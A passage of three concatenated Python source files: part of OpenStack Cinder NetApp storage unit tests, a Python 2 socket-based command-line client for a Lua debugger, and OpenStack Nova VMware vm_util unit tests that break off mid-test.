self.mock_object(na_utils, 'get_volume_extra_specs')
self.mock_object(na_utils, 'log_extra_spec_warnings')
self.mock_object(block_base, 'LOG')
self.mock_object(volume_utils, 'extract_host',
mock.Mock(return_value=fake.POOL_NAME))
self.mock_object(self.library, '_setup_qos_for_volume',
mock.Mock(return_value=None))
self.mock_object(self.library, '_create_lun')
self.mock_object(self.library, '_create_lun_handle')
self.mock_object(self.library, '_add_lun_to_table')
self.mock_object(self.library, '_mark_qos_policy_group_for_deletion')
def test_create_consistency_group(self):
model_update = self.library.create_consistencygroup(
fake.CONSISTENCY_GROUP)
self.assertEqual('available', model_update['status'])
def test_delete_consistencygroup_volume_delete_failure(self):
self.mock_object(block_base, 'LOG')
self.mock_object(self.library, '_delete_lun',
mock.Mock(side_effect=Exception))
model_update, volumes = self.library.delete_consistencygroup(
fake.CONSISTENCY_GROUP, [fake.CG_VOLUME])
self.assertEqual('deleted', model_update['status'])
self.assertEqual('error_deleting', volumes[0]['status'])
self.assertEqual(1, block_base.LOG.exception.call_count)
def test_delete_consistencygroup_not_found(self):
self.mock_object(block_base, 'LOG')
self.mock_object(self.library, '_get_lun_attr',
mock.Mock(return_value=None))
model_update, volumes = self.library.delete_consistencygroup(
fake.CONSISTENCY_GROUP, [fake.CG_VOLUME])
self.assertEqual(0, block_base.LOG.error.call_count)
self.assertEqual(1, block_base.LOG.warning.call_count)
self.assertEqual(0, block_base.LOG.info.call_count)
self.assertEqual('deleted', model_update['status'])
self.assertEqual('deleted', volumes[0]['status'])
def test_create_consistencygroup_from_src_cg_snapshot(self):
mock_clone_source_to_destination = self.mock_object(
self.library, '_clone_source_to_destination')
self.library.create_consistencygroup_from_src(
fake.CONSISTENCY_GROUP, [fake.VOLUME], cgsnapshot=fake.CG_SNAPSHOT,
snapshots=[fake.CG_VOLUME_SNAPSHOT])
clone_source_to_destination_args = {
'name': fake.CG_SNAPSHOT['name'],
'size': fake.CG_SNAPSHOT['volume_size'],
}
mock_clone_source_to_destination.assert_called_once_with(
clone_source_to_destination_args, fake.VOLUME)
def test_create_consistencygroup_from_src_cg(self):
class fake_lun_name(object):
pass
fake_lun_name_instance = fake_lun_name()
fake_lun_name_instance.name = fake.SOURCE_CG_VOLUME['name']
self.mock_object(self.library, '_get_lun_from_table', mock.Mock(
return_value=fake_lun_name_instance)
)
mock_clone_source_to_destination = self.mock_object(
self.library, '_clone_source_to_destination')
self.library.create_consistencygroup_from_src(
fake.CONSISTENCY_GROUP, [fake.VOLUME],
source_cg=fake.SOURCE_CONSISTENCY_GROUP,
source_vols=[fake.SOURCE_CG_VOLUME])
clone_source_to_destination_args = {
'name': fake.SOURCE_CG_VOLUME['name'],
'size': fake.SOURCE_CG_VOLUME['size'],
}
mock_clone_source_to_destination.assert_called_once_with(
clone_source_to_destination_args, fake.VOLUME)
def test_handle_busy_snapshot(self):
self.mock_object(block_base, 'LOG')
mock_get_snapshot = self.mock_object(
self.zapi_client, 'get_snapshot',
mock.Mock(return_value=fake.SNAPSHOT)
)
self.library._handle_busy_snapshot(fake.FLEXVOL, fake.SNAPSHOT_NAME)
self.assertEqual(1, block_base.LOG.info.call_count)
mock_get_snapshot.assert_called_once_with(fake.FLEXVOL,
fake.SNAPSHOT_NAME)
| |
#!/usr/bin/env python
"""
A simple test client for the lua debugger.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Version:
Sri Panyam 05 Dec 2008
Initial version
"""
import os, sys
import re, string
import socket
import simplejson as json
import Queue, threading
def print_table(table_value, level = 1):
for kvpair in table_value:
lKey = kvpair['key']
lVal = kvpair['value']
if lVal["type"] == "table" and "raw" not in lVal:
print "%s[%s (%s)] -> " % (level * " ", str(lKey["value"]), str(lKey["type"]))
print_table(lVal["value"], level + 1)
else:
print "%s[%s (%s)] -> %s : (%s)" % \
(level * " ",
str(lKey["value"]), str(lKey["type"]),
str(lVal["value"]), str(lVal["type"]))
def strip_quotes(x):
if x[0] == "'" or x[0] == '"':
x = x[1:]
if x[-1] == "'" or x[-1] == '"':
x = x[:-1]
return x
def tokenize(string):
""" A simple tokenizer for getting contigious letters/alphabets
or a quoted string. """
exp = re.compile('([^\s\"\']+)|(\"[^\"]*\")|(\'[^\']*\')')
tokens = exp.finditer(string)
return [token.group() for token in tokens]
class Debugger:
""" The actual debugger front end. """
PROMPT = "LDB: "
def __init__(self, luahost = "localhost", luaport = 9999):
self.current_context = -1
self.context_list = []
self.currContext = None
self.currFrame = 0
self.luaHost = luahost
self.luaPort = luaport
self.msg_counter = 0
self.messages = Queue.Queue()
self.debugClient = DebugClient(self.message_callback)
def __del__(self):
self.disconnect()
def do_prompt(self, prompt = PROMPT):
if self.debugClient.isAlive():
return raw_input(prompt).strip()
return None
def run(self):
""" Runs the command line loop. """
if self.debugClient.isAlive():
self.debugClient.disconnect()
self.debugClient.connect(self.luaHost, self.luaPort)
self.debugClient.start()
try:
input = self.do_prompt()
while (input != None and input != "quit"):
if input:
self.process_input(input)
input = self.do_prompt()
except:
a, b, c = sys.exc_info()
print "Exception at Debugger: ", a, b, dir(c)
self.disconnect()
def send_message(self, cmd, data = None):
self.msg_counter += 1
self.debugClient.send_message(self.msg_counter, cmd, data)
def process_input(self, input):
args = tokenize(input)
cmd = args[0]
handler = self.get_command_handler(cmd)
handler(cmd, args[1:], True)
def get_command_handler(self, cmd):
return getattr(self, "command_" + cmd, self.invalid_command)
def disconnect(self):
print "Stopping Debugger ..."
self.debugClient.disconnect()
def message_callback(self, data):
# print "Decoding data: ", data
decdata = json.decoder.JSONDecoder().decode(data)
# print "Decoded data: ", decdata
msgtype = decdata["type"]
if msgtype == "Reply":
# We are dealing with a reply instead of an event
if 'code' not in decdata:
print "Code not found in reply: ", decdata
return
if decdata['code'] != 0:
print "Code: ", decdata['code'], " Error: ", decdata['value']
return
orig_msg = decdata["original"]
handler = None
command = None
if 'cmd' in orig_msg:
command = orig_msg['cmd']
if command:
handler = self.get_command_handler(command)
if handler:
handler(command, decdata, False)
else:
print "No handler found for command: %s" % command
elif msgtype == "Event":
self.handle_event(decdata["event"], decdata["data"])
else:
print "Invalid message type: ", msgtype, ", Data: ", decdata
def handle_event(self, evt_name, evt_data):
""" Handles an event from the server. """
print ""
print "Recieved Event: ", evt_name # , evt_data
if evt_name == "ContextPaused":
pass
else:
pass
def command_breaks(self, command, data, sending):
"""
Prints out a list of all breakpoints.
Parameters:
None
"""
if sending:
self.send_message("breaks")
else:
if 'value' not in data or not data['value']:
print "No breakpoints set."
else:
bps = data['value']
print ""
print "Breakpoints: "
print "============="
for i in xrange(0, len(bps)):
if 'funcname' in bps[i]:
print " %5d - Function: %s" % (i + 1, bps[i]['funcname'])
else:
print " %5d - File: %s, Line: %d" % (i + 1, bps[i]['filename'], bps[i]['linenum'])
def command_break(self, command, args, sending):
"""
Sets a break point.
Parameters:
\\1 filename/function File or Function where breakpoint is to be set
\\2 linenumber Line where the breakpoint is to be set
(this implies breakpoint is a file
breakpoint rather than a function
breakpoint).
"""
if sending:
if len(args) == 0:
return self.print_help(command)
if len(args) == 1:
data = {'funcname': args[0]}
else:
data = {'filename': "@" + args[0], 'linenum': int(args[1])}
# print "Sending break command: ", data
self.send_message("break", data)
else:
data = args
print "Breakpoint successfully set at: ", data['original']['data']
def command_clear(self, command, args, sending):
"""
Clears a break point.
Parameters:
\\1 filename/function File or Function where breakpoint is to be cleared
\\2 linenumber Line where the breakpoint is to be cleared
(this implies breakpoint is a file
breakpoint rather than a function
breakpoint).
"""
if sending:
if len(args) == 0:
return self.print_help(command)
if len(args) == 1:
data = {'funcname': args[0]}
else:
data = {'filename': args[0], 'linenum': int(args[1])}
self.send_message("clear", data)
else:
data = args
print "Breakpoint successfully cleared at: ", data
def command_clearall(self, command, args, sending):
if sending:
self.send_message("clearall")
else: pass
def command_step(self, command, args, sending):
if sending:
if len(args) == 0:
return self.print_help(command)
self.send_message("step", {'context': args[0]})
else: pass
def command_next(self, command, args, sending):
if sending:
if len(args) == 0:
return self.print_help(command)
self.send_message("next", {'context': args[0]})
else: pass
def command_until(self, command, args, sending):
if sending: pass
else: pass
def command_finish(self, command, args, sending):
if sending:
if len(args) == 0:
return self.print_help(command)
self.send_message("finish", {'context': args[0]})
else: pass
def command_continue(self, command, args, sending):
"""
Continues from a break point.
Parameters:
\\1 context Address of the context to continue one. See
the 'contexts' command for further info.
"""
if sending:
if len(args) == 0:
return self.print_help(command)
self.send_message("continue", {'context': args[0]})
else: pass
def command_context(self, command, args, sending):
"""
Sets the current context. If no context is selected, the current
context is printed.
Parameters:
\\1 index Index of the context to be used as the current
context. The contexts currently being debugged can
be obtained with the contexts command.
"""
if len(args) > 0:
self.current_context = int(args[0])
if self.current_context < 0 or (not self.context_list):
print "No contexts available. Please run the contexts command."
return
if self.current_context >= len(self.context_list):
print "Invalid context index..."
return
print "Current Context: ", self.context_list[self.current_context]
def command_contexts(self, command, args, sending):
if sending:
self.send_message("contexts")
else:
self.context_list = args["value"]
if "noprint" not in args["original"]:
print ""
print "Contexts:"
print "========="
for ctx in self.context_list:
print " Name: '%s', Addr: %s, Running: %s" % (ctx["name"], ctx["address"], str(ctx["running"]))
if (not ctx["running"]) and "location" in ctx:
print " At: %s" % ctx["location"]
print ""
def command_reset(self, command, args, sending):
if sending:
self.send_message("reset")
else: pass
def command_set(self, command, args, sending):
if sending: pass
else: pass
def command_eval(self, command, args, sending):
"""
Evaluates an expression in a particular stack.
Parameters:
\\1 context Address of the context where the expression is
to be evaluated.
\\2 expr_str Lua expression string to be evaluated.
"""
if sending:
if len(args) < 2:
return self.print_help(command)
self.send_message("eval", {'context': args[0], 'expr_str': strip_quotes(args[1])})
else:
data = args
print "Result: ", data["value"]
def command_local(self, command, args, sending):
"""
Prints the value of a local variable in a given stack frame.
Parameters:
\\1 context Address of the context whose local variables
are to be printed.
\\2 lvindex Optional. The local variable index whose value
is to be extracted - Defaults to 1.
\\3 nlevels Optional. Number of levels to recurse into the
variable - Defaults to 1.
\\4 frame Optional. The frame whose LVs are to be
printed. Defaults to 0.
"""
if sending:
if len(args) == 0:
return self.print_help(command)
lvindex = 1
nlevels = 1
frame = 0
if len(args) > 1:
lvindex = int(args[1])
if len(args) > 2:
nlevels = int(args[2])
if len(args) > 3:
frame = int(args[3])
self.send_message("local", {'context': args[0], 'frame': frame, 'lv': lvindex, 'nlevels': nlevels})
else:
results = args["value"]
local_name = results["name"]
local_type = results["type"]
local_value = results["value"]
print ""
print "Name: %s, Type: " % local_name, local_type
if local_type != "table":
print "Value: ", local_value
else:
print_table(local_value)
def command_locals(self, command, args, sending):
"""
Prints all local variables in a given stack frame.
Parameters:
\\1 context Address of the context whose local variables
are to be printed.
\\2 frame Optional. The frame whose LVs are to be
printed. Defaults to 0.
"""
if sending:
if len(args) == 0:
return self.print_help(command)
if len(args) > 1: frame = int(args[1])
else: frame = 0
self.send_message("locals", {'context': args[0], 'frame': frame})
else:
print ""
print "Locals:"
print "======="
for lv in args["value"]:
print " Name: '%s'" % (lv)
print ""
def command_upval(self, command, args, sending):
"""
Prints the value of a local variable in a given stack frame.
Parameters:
\\1 context Address of the context whose local variables
are to be printed.
\\2 uvindex Optional. Function index. Defaults to 1.
\\3 uvindex Optional. The local variable index whose value
is to be extracted - Defaults to 1.
\\4 nlevels Optional. Number of levels to recurse into the
variable - Defaults to 1.
\\5 frame Optional. The frame whose LVs are to be
printed. Defaults to 0.
"""
if sending:
if len(args) == 0:
return self.print_help(command)
funcindex = 1
uvindex = 1
nlevels = 1
frame = 0
if len(args) > 1:
uvindex = int(args[1])
if len(args) > 2:
nlevels = int(args[2])
if len(args) > 3:
frame = int(args[3])
if len(args) > 4:
funcindex = int(args[4])
self.send_message("upval", {'context': args[0], 'frame': frame,
'uv': uvindex, 'nlevels': nlevels, 'func': funcindex})
else:
results = args["value"]
local_name = results["name"]
local_type = results["type"]
local_value = results["value"]
print ""
print "Name: %s, Type: " % local_name, local_type
if local_type != "table":
print "Value: ", local_value
else:
print_table(local_value)
def command_upvals(self, command, args, sending):
"""
Prints all local variables in a given stack frame.
Parameters:
\\1 context Address of the context whose local variables
are to be printed.
\\2 frame Optional. The frame whose LVs are to be
printed. Defaults to 0.
"""
if sending:
if len(args) == 0:
return self.print_help(command)
if len(args) > 1: frame = int(args[1])
else: frame = 0
self.send_message("upvals", {'context': args[0], 'frame': frame})
else:
print ""
print "UpValues:"
print "========="
for lv in args["value"]:
print " Name: '%s'" % (lv)
print ""
def command_frame(self, command, args, sending):
"""
Sets the selected frame as the active frame of the current context.
This is only valid if the context is being debugged.
"""
if self.current_context < 0 or self.current_context >= len(self.context_list):
print "No context selected. Please run the context command to select a context ..."
return
if self.context_list[self.current_context]["running"]:
print "Context is not paused. Frame cannot be selected."
return
def command_print(self, command, args, sending):
if sending: pass
else: pass
def command_list(self, command, args, sending):
if sending: pass
else: pass
def command_file(self, command, args, sending):
"""
Retrieves contents of a file in a given range.
Parameters:
\\1 filename
\\2 firstline (optional - default 1)
\\3 lastline (optional - default -1 => last line of the file)
Returns (via callback):
List of lines from the file in a given range.
"""
if sending:
if len(args) == 0:
return self.print_help(command)
data = {'file': args[0]}
if len(args) > 1:
data['first'] = int(args[1])
if len(args) > 2:
data['last'] = int(args[2])
self.send_message("file", data)
else:
data = args
orig = data['original']
file = orig['data']['file']
first = 1
if 'first' in orig['data']: first = orig['data']['first']
lines = data['value']
print " --- %s >>" % file
for i in xrange(0, len(lines)):
print " %5d > %s" % (first + i, lines[i])
def command_help(self, command, args, sending):
if args:
self.print_help(args[0])
else:
self.print_help()
def invalid_command(self, command, args, sending):
print "Invalid command: %s" % command
self.print_help(command, args)
def print_help(self, command = None, args = []):
handler = self.invalid_command
if command:
handler = self.get_command_handler(command)
if handler != self.invalid_command:
print "%s" % command
if handler.__doc__:
print handler.__doc__
else:
print "No help docs for this command yet."
else:
cmdlen = len("command_")
print "Command List: "
for (item, value) in Debugger.__dict__.items():
if item.startswith("command_"):
cmdname = item[cmdlen : ]
handler = self.get_command_handler(cmdname)
print " %s" % cmdname
if handler.__doc__:
print handler.__doc__
class DebugClient(threading.Thread):
""" A class that simply manages connections to the server and sends and
recives messages. """
MSG_WAITALL = 0x100
def sendall(self, messsage, msglen = None):
totalsent = 0
if msglen is None: msglen = len(message)
while totalsent < msglen:
sent = self.serverSocket.send(message[totalsent:])
if sent == 0:
raise RuntimeError, "Socket connection broken"
totalsent += sent
def recieveall(self, msglen):
msg = ""
while len(msg) < msglen:
chunk = self.serverSocket.recv(msglen - len(msg))
if chunk == "":
raise RuntimeError, "Socket connection broken"
msg += chunk
return msg
def __init__(self, msg_callback = None):
self.serverSocket = None
self.stopped = False
if msg_callback is not None:
self.msg_callback = msg_callback
else:
self.msg_callback = self.default_msg_callback
threading.Thread.__init__(self)
def default_msg_callback(self, data):
print "Recieved: ", data
def __del__(self):
self.disconnect()
def connect(self, host = "localhost", port = 9999):
""" Connect to the debug server. """
if self.isAlive():
self.disconnect()
self.serverSocket = socket.socket()
self.serverSocket.connect((host, port))
def disconnect(self):
""" Disconnect from the server. """
if self.isAlive():
print "Disconnecting from server ..."
self.stopped = True
if self.serverSocket:
print "Closing server socket..."
self.serverSocket.shutdown(socket.SHUT_RDWR)
self.serverSocket.close()
self.serverSocket = None
if self.isAlive():
self.join()
def run(self):
""" Thread callback function. """
self.stopped = False
if self.serverSocket is None:
print "Debug client has not been started. Please 'connect' first."
return
while self.serverSocket is not None and not self.stopped:
try:
data = self.read_string()
if data:
self.msg_callback(data)
else:
print "Server closed connection."
return
except:
a, b, c = sys.exc_info()
print "Exception at DebugClient: ", a, b, dir(c)
return
def read_string(self):
data = self.serverSocket.recv(4, DebugClient.MSG_WAITALL)
if len(data) == 4:
datalen = ((ord(data[0]) & 0xff)) | \
((ord(data[1]) & 0xff) << 8) | \
((ord(data[2]) & 0xff) << 16) | \
((ord(data[3]) & 0xff) << 24)
return self.serverSocket.recv(datalen, DebugClient.MSG_WAITALL)
return None
def send_message(self, id, msg_type, msg_data = None):
obj_str = json.encoder.JSONEncoder().encode({'id': id, 'cmd': msg_type, 'data': msg_data})
self.send_string(obj_str)
def send_string(self, s):
""" Sends a string s to the server. """
string_bytes = s # bytearray(s)
length = len(string_bytes)
size = chr(length & 0xff) + \
chr((length >> 8) & 0xff) + \
chr((length >> 16) & 0xff) + \
chr((length >> 24) & 0xff)
self.serverSocket.send(size)
self.serverSocket.send(string_bytes)
def run(host = "localhost", port = 9999): Debugger(host, port).run()
def usage():
print "Usage: python client.py run <host> <port>"
print " host and port are optional and default to "
print " localhost and 9999 respectively."
if __name__ == "__main__":
host = "localhost"
port = 9999
try:
if sys.argv[1] == "run":
if len(sys.argv) > 2:
host = sys.argv[2]
if len(sys.argv) > 3:
port = int(sys.argv[3])
except:
usage()
sys.exit()
run(host, port)
| |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2013 Hewlett-Packard Development Company, L.P.
# Copyright 2013 Canonical Corp.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import re
from nova import exception
from nova.openstack.common.gettextutils import _
from nova import test
from nova.virt.vmwareapi import fake
from nova.virt.vmwareapi import vm_util
class fake_session(object):
def __init__(self, ret=None):
self.ret = ret
def _call_method(self, *args):
return self.ret
class partialObject(object):
def __init__(self, path='fake-path'):
self.path = path
self.fault = fake.DataObject()
class VMwareVMUtilTestCase(test.NoDBTestCase):
def setUp(self):
super(VMwareVMUtilTestCase, self).setUp()
fake.reset()
def tearDown(self):
super(VMwareVMUtilTestCase, self).tearDown()
fake.reset()
def test_get_datastore_ref_and_name(self):
fake_objects = fake.FakeRetrieveResult()
fake_objects.add_object(fake.Datastore())
result = vm_util.get_datastore_ref_and_name(
fake_session(fake_objects))
self.assertEquals(result[1], "fake-ds")
self.assertEquals(result[2], 1024 * 1024 * 1024 * 1024)
self.assertEquals(result[3], 1024 * 1024 * 500 * 1024)
def test_get_datastore_ref_and_name_with_regex(self):
# Test with a regex that matches with a datastore
datastore_valid_regex = re.compile("^openstack.*\d$")
fake_objects = fake.FakeRetrieveResult()
fake_objects.add_object(fake.Datastore("openstack-ds0"))
fake_objects.add_object(fake.Datastore("fake-ds0"))
fake_objects.add_object(fake.Datastore("fake-ds1"))
result = vm_util.get_datastore_ref_and_name(
fake_session(fake_objects), None, None, datastore_valid_regex)
self.assertEquals("openstack-ds0", result[1])
def test_get_datastore_ref_and_name_with_list(self):
# Test with a regex containing whitelist of datastores
datastore_valid_regex = re.compile("(openstack-ds0|openstack-ds2)")
fake_objects = fake.FakeRetrieveResult()
fake_objects.add_object(fake.Datastore("openstack-ds0"))
fake_objects.add_object(fake.Datastore("openstack-ds1"))
fake_objects.add_object(fake.Datastore("openstack-ds2"))
result = vm_util.get_datastore_ref_and_name(
fake_session(fake_objects), None, None, datastore_valid_regex)
self.assertNotEquals("openstack-ds1", result[1])
def test_get_datastore_ref_and_name_with_regex_error(self):
# Test with a regex that has no match
# Checks if code raises DatastoreNotFound with a specific message
datastore_invalid_regex = re.compile("unknown-ds")
exp_message = (_("Datastore regex %s did not match any datastores")
% datastore_invalid_regex.pattern)
fake_objects = fake.FakeRetrieveResult()
fake_objects.add_object(fake.Datastore("fake-ds0"))
fake_objects.add_object(fake.Datastore("fake-ds1"))
# assertRaisesRegExp would have been a good choice instead of
# try/catch block, but it's available only from Py 2.7.
try:
vm_util.get_datastore_ref_and_name(
fake_session(fake_objects), None, None,
datastore_invalid_regex)
except exception.DatastoreNotFound as e:
self.assertEquals(exp_message, e.args[0])
else:
self.fail("DatastoreNotFound Exception was not raised with "
"message: %s" % exp_message)
def test_get_datastore_ref_and_name_without_datastore(self):
self.assertRaises(exception.DatastoreNotFound,
vm_util.get_datastore_ref_and_name,
fake_session(), host="fake-host")
self.assertRaises(exception.DatastoreNotFound,
vm_util.get_datastore_ref_and_name,
fake_session(), cluster="fake-cluster")
def test_get_host_ref_from_id(self):
fake_host_name = "ha-host"
fake_host_sys = fake.HostSystem(fake_host_name)
fake_host_id = fake_host_sys.obj.value
fake_objects = fake.FakeRetrieveResult()
fake_objects.add_object(fake_host_sys)
ref = vm_util.get_host_ref_from_id(
fake_session(fake_objects), fake_host_id, ['name'])
self.assertIsInstance(ref, fake.HostSystem)
self.assertEqual(fake_host_id, ref.obj.value)
host_name = vm_util.get_host_name_from_host_ref(ref)
self.assertEquals(fake_host_name, host_name)
def test_get_host_ref_no_hosts_in_cluster(self):
self.assertRaises(exception.NoValidHost,
vm_util.get_host_ref,
fake_session(""), 'fake_cluster')
def test_get_datastore_ref_and_name_no_host_in_cluster(self):
self.assertRaises(exception.DatastoreNotFound,
vm_util.get_datastore_ref_and_name,
fake_session(""), 'fake_cluster')
def test_get_host_name_for_vm(self):
fake_host = fake.HostSystem()
fake_host_id = fake_host.obj.value
fake_vm = fake.VirtualMachine(name='vm-123',
runtime_host=fake_host.obj)
fake_objects = fake.FakeRetrieveResult()
fake_objects.add_object(fake_vm)
vm_ref = vm_util.get_vm_ref_from_name(
fake_session(fake_objects), 'vm-123')
self.assertIsNotNone(vm_ref)
host_id = vm_util.get_host_id_from_vm_ref(
fake_session(fake_objects), vm_ref)
self.assertEqual(fake_host_id, host_id)
def test_property_from_property_set(self):
ObjectContent = collections.namedtuple('ObjectContent', ['propSet'])
DynamicProperty = collections.namedtuple('Property', ['name', 'val'])
MoRef = collections.namedtuple('Val', ['value'])
good_objects = fake.FakeRetrieveResult()
results_good = [
ObjectContent(propSet=[
DynamicProperty(name='name', val=MoRef(value='vm-123'))]),
ObjectContent(propSet=[
DynamicProperty(name='foo', val=MoRef(value='bar1')),
DynamicProperty(
name='runtime.host', val=MoRef(value='host-123')),
DynamicProperty(name='foo', val=MoRef(value='bar2')),
]),
ObjectContent(propSet=[
DynamicProperty(
name='something', val=MoRef(value='thing'))]), ]
for result in results_good:
good_objects.add_object(result)
bad_objects = fake.FakeRetrieveResult()
results_bad = [
ObjectContent(propSet=[
DynamicProperty(name='name', val=MoRef(value='vm-123'))]),
ObjectContent(propSet=[
DynamicProperty(name='foo', val='bar1'),
DynamicProperty(name='foo', val='bar2'), ]),
ObjectContent(propSet=[
DynamicProperty(
name='something', val=MoRef(value='thing'))]), ]
for result in results_bad:
bad_objects.add_object(result)
prop = vm_util.property_from_property_set(
'runtime.host', good_objects)
self.assertIsNotNone(prop)
value = prop.val.value
self.assertEqual('host-123', value)
prop2 = vm_util.property_from_property_set(
'runtime.host', bad_objects)
self.assertIsNone(prop2)
prop3 = vm_util.property_from_property_set('foo', good_objects)
self.assertIsNotNone(prop3)
val3 = prop3.val.value
self.assertEqual('bar1', val3)
prop4 = vm_util.property_from_property_set('foo', bad_objects)
self.assertIsNotNone(prop4)
self.assertEqual('bar1', prop4.val)
def test_get_datastore_ref_and_name_inaccessible_ds(self):
data_store = fake.Datastore()
data_store.set("summary.accessible", False)
fake_objects = fake.FakeRetrieveResult()
fake_objects.add_object(data_store)
self.assertRaises(exception.DatastoreNotFound,
vm_util.get_datastore_ref_and_name,
fake_session(fake_objects))
def test_get_resize_spec(self):
fake_instance = {'id': 7, 'name': 'fake!',
'uuid': 'bda5fb9e-b347-40e8-8256-42397848cb00',
'vcpus': 2, 'memory_mb': 2048}
result = vm_util.get_vm_resize_spec(fake.FakeFactory(),
fake_instance)
expected = """{'memoryMB': 2048,
'numCPUs': 2,
'obj_name': 'ns0:VirtualMachineConfigSpec'}"""
expected = re.sub(r'\s+', '', expected)
result = re.sub(r'\s+', '', repr(result))
self.assertEqual(expected, result)
def test_get_cdrom_attach_config_spec(self):
result = vm_util.get_cdrom_attach_config_spec(fake.FakeFactory(),
fake.Datastore(),
"/tmp/foo.iso",
0)
expected = """{
'deviceChange': [
{
'device': {
'connectable': {
'allowGuestControl': False,
'startConnected': True,
'connected': True,
'obj_name': 'ns0: VirtualDeviceConnectInfo'
},
'backing': {
'datastore': {
"summary.type": "VMFS",
"summary.freeSpace": 536870912000,
"summary.capacity": 1099511627776,
"summary.accessible":true,
"summary.name": "fake-ds"
},
'fileName': '/tmp/foo.iso',
'obj_name': 'ns0: VirtualCdromIsoBackingInfo'
},
'controllerKey': 200,
'unitNumber': 0,
'key': -1,
'obj_name': 'ns0: VirtualCdrom'
},
'operation': 'add',
'obj_name': 'ns0: VirtualDeviceConfigSpec'
}
],
'obj_name': 'ns0: VirtualMachineConfigSpec'
}
"""
expected = re.sub(r'\s+', '', expected)
result = re.sub(r'\s+', '', repr(result))
self.assertEqual(expected, result)
def test_lsilogic_controller_spec(self):
# Test controller spec returned for lsiLogic sas adapter type
config_spec = vm_util.create_controller_spec(fake.FakeFactory(), -101,
adapter_type="lsiLogicsas")
self.assertEqual("ns0:VirtualLsiLogicSASController",
config_spec.device.obj_name)
def test_get_vmdk_path_and_adapter_type(self):
# Test the adapter_type returned for a lsiLogic sas controller
controller_key = 1000
filename = '[test_datastore] test_file.vmdk'
disk = fake.VirtualDisk()
disk.controllerKey = controller_key
disk_backing = fake.VirtualDiskFlatVer2BackingInfo()
disk_backing.fileName = filename
disk.backing = disk_backing
controller = fake.VirtualLsiLogicSASController()
controller.key = controller_key
devices = [disk, controller]
vmdk_info = vm_util.get_vmdk_path_and_adapter_type(devices)
adapter_type = vmdk_info[2]
self.assertEqual('lsiLogicsas', adapter_type)
def test_get_vmdk_adapter_type(self):
# Test for the adapter_type to be used in vmdk descriptor
# Adapter type in vmdk descriptor is same for LSI-SAS & LSILogic
vmdk_adapter_type = vm_util.get_vmdk_adapter_type("lsiLogic")
self.assertEqual("lsiLogic", vmdk_adapter_type)
vmdk_adapter_type = vm_util.get_vmdk_adapter_type("lsiLogicsas")
self.assertEqual("lsiLogic", vmdk_adapter_type)
vmdk_adapter_type = vm_util.get_vmdk_adapter_type("dummyAdapter")
self.assertEqual("dummyAdapter", vmdk_adapter_type)
def _test_get_vnc_config_spec(self, port, password):
result = vm_util.get_vnc_config_spec(fake.FakeFactory(),
port, password)
return result
def test_get_vnc_config_spec(self):
result = self._test_get_vnc_config_spec(7, None)
expected = """{'extraConfig': [
{'value': 'true',
'key': 'RemoteDisplay.vnc.enabled',
'obj_name': 'ns0:OptionValue'},
{'value': 7,
'key': 'RemoteDisplay.vnc.port',
'obj_name': 'ns0:OptionValue'}],
'obj_name': 'ns0:VirtualMachineConfigSpec'}"""
expected = re.sub(r'\s+', '', expected)
result = re.sub(r'\s+', '', repr(result))
self.assertEqual(expected, result)
def test_get_vnc_config_spec_password(self):
result = self._test_get_vnc_config_spec(7, 'password')
expected = """{'extraConfig': [
{'value': 'true',
'key': 'RemoteDisplay.vnc.enabled',
'obj_name': 'ns0:OptionValue'},
{'value': 7,
'key': 'RemoteDisplay.vnc.port',
'obj_name': 'ns0:OptionValue'},
{'value':'password',
'key':'RemoteDisplay.vnc.password',
'obj_name':'ns0:OptionValue'}],
'obj_name': 'ns0:VirtualMachineConfigSpec'}"""
expected = re.sub(r'\s+', '', expected)
result = re.sub(r'\s+', '', repr(result))
self.assertEqual(expected, result)
def test_get_all_cluster_refs_by_name_none(self):
fake_objects = fake.FakeRetrieveResult()
refs = vm_util.get_all_cluster_refs_by_name(fake_session(fake_objects),
['fake_cluster'])
self.assertTrue(not refs)
def test_get_all_cluster_refs_by_name_exists(self):
fake_objects = fake.FakeRetrieveResult()
fake_objects.add_object(fake.ClusterComputeResource(name='cluster'))
refs = vm_util.get_all_cluster_refs_by_name(fake_session(fake_objects),
['cluster'])
self.assertTrue(len(refs) == 1)
def test_get_all_cluster_refs_by_name_missing(self):
fake_objects = fake.FakeRetrieveResult()
fake_objects.add_object(partialObject(path='cluster'))
refs = vm_util.get_all_cluster_refs_by_name(fake_session(fake_objects),
['cluster'])
self.assertTrue(not refs)
def test_propset_dict_simple(self):
ObjectContent = collections.namedtuple('ObjectContent', ['propSet'])
DynamicProperty = collections.namedtuple('Property', ['name', 'val'])
object = ObjectContent(propSet=[
DynamicProperty(name='foo', val="bar")])
propdict = vm_util.propset_dict(object.propSet)
self.assertEqual("bar", propdict['foo'])
def test_propset_dict_complex(self):
ObjectContent = collections.namedtuple('ObjectContent', ['propSet'])
DynamicProperty = collections.namedtuple('Property', ['name', 'val'])
MoRef = collections.namedtuple('Val', ['value'])
object = ObjectContent(propSet=[
DynamicProperty(name='foo', val="bar"),
DynamicProperty(name='some.thing',
val=MoRef(value='else')),
DynamicProperty(name='another.thing', val='value')])
propdict = vm_util.propset_dict(object.propSet)
self.assertEqual("bar", propdict['foo'])
self.assertTrue(hasattr(propdict['some.thing'], 'value'))
self.assertEqual("else", propdict['some.thing'].value)
self.assertEqual("value", propdict['another.thing'])
def _test_detach_virtual_disk_spec(self, destroy_disk=False):
virtual_device_config = vm_util.detach_virtual_disk_spec(
fake.FakeFactory(),
'fake_device',
destroy_disk)
self.assertEqual('remove', virtual_device_config.operation)
self.assertEqual('fake_device', virtual_device_config.device)
self.assertEqual('ns0:VirtualDeviceConfigSpec',
virtual_device_config.obj_name)
if destroy_disk:
self.assertEqual('destroy', virtual_device_config.fileOperation)
else:
